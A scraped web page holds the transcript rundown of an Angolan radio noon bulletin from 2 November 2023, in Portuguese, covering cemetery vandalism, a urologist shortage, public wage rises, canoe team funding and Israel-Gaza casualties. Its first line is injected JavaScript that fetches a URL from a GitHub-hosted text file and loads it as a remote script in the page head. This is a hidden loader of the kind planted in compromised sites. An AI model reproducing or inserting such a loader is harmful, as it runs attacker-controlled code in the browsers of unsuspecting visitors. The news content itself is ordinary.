;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 02 de Novembro de 2023 | RadioPlayDigital
Jornal 12h, edição de 02 de Novembro de 2023

Tópicos:

AUMENTAM OS CASOS DE VANDALIZAÇÃO E ROUBO NO INTERIOR DOS CEMITÉRIOS. POLÍCIA EM LUANDA GARANTE ASSEGURAMENTO NOS CAMPOS SANTOS NO DIA DEDICADO AOS FINADOS;

– APENAS TRINTA E SEIS MÉDICOS UROLOGISTAS ESTÃO INSCRITOS NA ORDEM DOS MÉDICOS DE ANGOLA;

– CGSILA AFIRMA QUE POSSÍVEL AUMENTO DE CINCO PORCENTO NOS SALÁRIOS DA FUNÇÃO PÚBLICA NÃO VAI RESOLVER PRINCIPAIS PROBLEMAS DOS TRABALHADORES NO PAÍS;

– PARTICIPAÇÃO DA SELECÇÃO NACIONAL DE CANOAGEM AO CAMPEONATO AFRICANO CONTINUA CONDICIONADA POR FALTA DE DINHEIRO;

– AUTORIDADES ISRAELISTAS E PALESTINIANAS CONFIRMAM A MORTE DE MAIS DE DEZ MIL PESSOAS, EM CONSEQUÊNCIA DA GUERRA ENTRE OS DOIS PAÍSES, QUE SEGUE HOJE PARA O SEU VIGÉSIMO SÉTIMO DIA.

JINGLE MIX 

Jornal ao meio dia, quinta-feira, 2 de Novembro de 2023, Dia dedicao aos Finados. Coordenação de Alves Fernandes, técnica de Edson Machado e Mauro Fernandes, edição e apresentação de Zacarias Congo.   

JINGLE 

Milhares de pessoas em todo o país continuam a deslocar-se hoje aos cemitérios para prestarem homanagem e limparem as campas dos seus entequeridos, neste feriado, dedicado aos finados.

Aqui na capital, o cenário nos cemitérios é de muita movimentação, onde centenas de pessoas recordam a memória daqueles que em vida foram seus parentes e próximos, como é o caso das cidadãs Maria Catepa e Márcia Alberto, que esta manhã foram ouvidas pela MFM, no cemitério do Camama.

VOX POP CEMITÉRIO CAMAMA – 01′ 02” 12H 021123

Já o responsável do referido cemitério, Jerónimo Chilunda, lamenta a postura de indivíduos que deitam o lixo no interior dos campos sagrados e apela, por outro lado, a maior respeito às pessoas que trabalham nos cemitérios.

JERÓNIMO CHILUNDA – 01′ 25” 12H 021123 

E a jornalista Maria Humba conversou com alguns trabalhadores do cemitério do Benfica, no município de Belas, que realizam trabalhos diversos, desde escavação de covas, manutenção dos geradores e construção de campas. 

De acordos com os mesmos, mensalmente são estimulados com apenas seis mil kwanzas, valores que têm sido insuficientes para o sustento das suas famílias.

PEÇA MARIA HUMBA – 02′ 38” 12H 021123

E os ouvintes da MFM afirmam que tem crescido o desrespeito aos campos santos, agravado com actos de vandalização das campas e roubos no interior dos cemitérios, prática que se vai observando um pouco por todo o país.  

Os cidadãos, que participavam no programa SHOW DA MANHÃ, apelam, por isso, a maior intervenção das autoridades para a inversão do quadro. 

VOX POP CEMITÉRIOS – 01’ 59’’ 12H 021123 

No entanto, a polícia em Luanda garante prontidão para o asseguramento nos cemitérios durante o dia de hoje, dedicado aos defuntos.

A confirmação é do porta-voz do comando provincial de Luanda, superintendente Nestor Goubel. 

NESTOR GOUBEL – 01’ 08’’ 12H 021123

Superintendente Nestor Goubel, porta-voz da polícia em Luanda.

Hoje é feriado em Angola, por ocasião do Dia dos Finados. 

PONTO

Apenas 36 médicos especialistas em urologia estão inscritos na Ordem dos Médicos em Angola. 

A informação foi avançada à MFM pelo médico urologista e especialista em doenças da próstata, HERIBERTO BICKMAN.

O convidado da edição de hoje do programa A ÚLTIMA PALAVRA avançou ainda que o número de pessoas afectadas pelo cancro da próstata no país tem crescido nos últimos anos.

HERIBERTO BICKMAN 01 – 02’’ 14’’ 12H 021123

O também especialista em doenças sexualmente transmissíveis, infertilidade e disfunção sexual, deixa recomendações sobre medidas preventivas relacionadas ao cancro da próstata para homens com mais de 40 anos.

HERIBERTO BICKMAN 02 – 30’’ 12H 021123

HERIBERTO BICKMAN, médico urologista e especialista em doenças da próstata, que foi o convidado da edição de hoje do programa A ÚLTIMA PALAVRA.

O estimado ouvinte está convidado a acompanhar a reposição da grande entrevista da MFM, logo mais, às 20h.

Numa altura em que arrancou, ontem, o Novembro Azul, que visa incentivar ao diagnóstico precoce do Cancro da Próstata. 

PONTO

A CGSILA, Central Geral dos Sindicatos Independentes e Livres de Angola, considera que o governo continua a afastar-se do diálogo com os seus parceiros sociais, na tomada de decisões sobre os principais desafios do país.

Reagindo ao anúncio do executivo sobre a previsão da subida de 5% por cento dos salários da função pública no próximo ano, bem como a isenção do Imposto sobre Rendimento de Trabalho em salários que vão até 100 mil kwanzas ao contrário dos 70 em curso, o secretário-geral da CGSILA, Francisco Jacinto, disse à MFM que a medida não ajudará a resolver as grandes preocupações dos trabalhadores angolanos.

FRANCISCO JACINTO 01 – 02’ 10’’ 12H 021123

Francisco Jacinto, secretário-geral da CGSILA, Central Geral dos Sindicatos Independentes e Livres de Agola.

E recordamos as palavras da ministra das Finanças, Vera Daves, afirmando que a proposta do Orçamento Geral do Estado para 2024, apresentada na última terça-feira na Assembleia Nacional, olha para os rendimentos das famílias.

VERA DAVES – 01′ 22” 12H 021123

Ministra das Finanças, Vera Daves.

O Orçamento Geral do Estado para o próximo ano prevê receitas e despesas no montante de 24,7 biliões de kwanzas.

Cerca de oitenta porcento de toda a produção agrícola no país é fruto da agricultura familiar.

A informação foi avançada, no Cuando Cubano, pelo Secretário de Estado para Economia, Ivan Marques dos Santos, esta quarta-feira, durante a abertura do ano agrícola 2023/2024 naquela província.

IVAN DOS SANTOS – 23” 12H 021123

Ivan Marques dos Santos, Secretário de Estado para Economia, Ivan Marques dos Santos.

O novo ano agrícola no Cuando Cubango conta com o envolvimento de cento e seis mil famílias camponesas, com a previsão de colheita de mais de duzentas mil toneladas de produtos diversos.

PONTO ECONOMIA

A desaceleração do Kwanza está a incentivar o comércio transfronteirço entre Angola e os países vizinhos.  

Segundo dados, as exportações de produtos de Angola para os países vizinhos, de produtos como madeira, mariscos, cimento, rochas ornamentais e bebidas, regista, nos últimos tempos, um crescimento considerável. 

No entanto, a exportação de pescado e outros produtos deve se conformar as necessidades de mercado. 

Mas o analista MFM, Carlos Rosado de Carvalho, pensa que a tendência de mercado é a melhoria das trocas comerciais; 

CARLOS ROSADO – 02’ 06’’ 12H 

Analista MFM, Carlos Rosado de Carvalho.

PONTO DESPORTO

A participação da selecção angolana de canoagem no campeonato africano da modalidade que acontece de 21 a 27 deste mês na Nigéria continua condicionada por falta de dinheiro. 

A Federação Angolana dos Desportos Naúticos precisa pelo menos de 25 milhões de kwanzas, e até ao momento ainda não recebeu nenhum apoio financeiro. 

Domingos Pemba, um dos membros da federação, disse hoje à MFM que Angola tem mais uma semana para garantir a participação no africano, qualificativo aos Jogos Olímpicos 2024. 

RD-DOMINGOS PEMBA – 01’ 00’’ 12H 

Domingos Pemba, membro da Federação Angolana dos Desportos Náuticos.

Mais dados sobre este e outros assuntos desportivos, o amigo ouvinte vai acompanhar logo no Jornal Desportivo com o Hilário Leonardo, logo a seguir a este serviço informativo.

PONTO INTERNACIONAL

Pelo menos 10.328 pessoas morreram até ao momento em consequência da guerra entre Israel e Palestina, que entrou hoje para o seu vigésimo sétimo dia, de acordo com dados divulgados pelas autoridades de saúde de ambos os lados.

O departamento de saúde palestino, controlado pelo Hamas na Faixa de Gaza, relatou, ainda, mais de 22 mil feridos e mais de 2 mil pessoas desaparecidas.

Desde o início dos combates entre Israel e o movimento islâmico Hamas, no dia 7 de outubro, os ataques israelitas na Faixa de Gaza provocaram mais de oito mil mortos, deixando ainda milhares de feridos e desaparecidos.

Esta quarta-feira, o primeiro-ministro de Israel, Benjamin Netanyahu, afirmou que o seu país vai vencer a guerra contra o movimento islamita palestiniano Hamas, apesar das perdas de soldados israelitas no conflito.

Data de Emissão: 02-11-2023 às 00:00
Género(s): Noticiário
 
PARTICIPANTES
PUB RADIO PLAY

Relacionados